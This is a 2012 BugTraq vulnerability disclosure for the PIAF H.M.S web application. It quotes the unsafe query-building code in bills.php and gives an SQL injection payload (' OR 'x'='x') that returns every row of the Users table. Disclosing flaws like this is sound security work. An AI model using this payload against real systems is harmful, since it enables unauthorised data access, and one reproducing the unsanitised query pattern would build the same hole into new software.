BugTraq
Back to list
|
Post reply
PIAF H.M.S - SQL Injection
Oct 28 2012 12:29PM
MichaÅ? BÅ?aszczak (blaszczakm gmail com)
# Exploit Title: PIAF H.M.S - SQL Injection
# Date: 28/10/2012
# Author: MichaÅ? BÅ?aszczak
# Website: http://blaszczakm.blogspot.com
# Vendor Homepage: http://code.google.com/p/piafhms/
file: bills.php
line: 86-87
$query = $query . " ORDER BY ID DESC";
printf($query);
query:
SELECT * FROM `Users` WHERE `Room` = 'anything' OR 'x'='x' ORDER BY ID DESC
MichaÅ? BÅ?aszczak
blaszczakm.blogspot.com
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
# Date: 28/10/2012
# Author: MichaÅ? BÅ?aszczak
# Website: http://blaszczakm.blogspot.com
# Vendor Homepage: http://code.google.com/p/piafhms/
file: bills.php
line: 86-87
$query = $query . " ORDER BY ID DESC";
printf($query);
query:
SELECT * FROM `Users` WHERE `Room` = 'anything' OR 'x'='x' ORDER BY ID DESC
MichaÅ? BÅ?aszczak
blaszczakm.blogspot.com
[ reply ]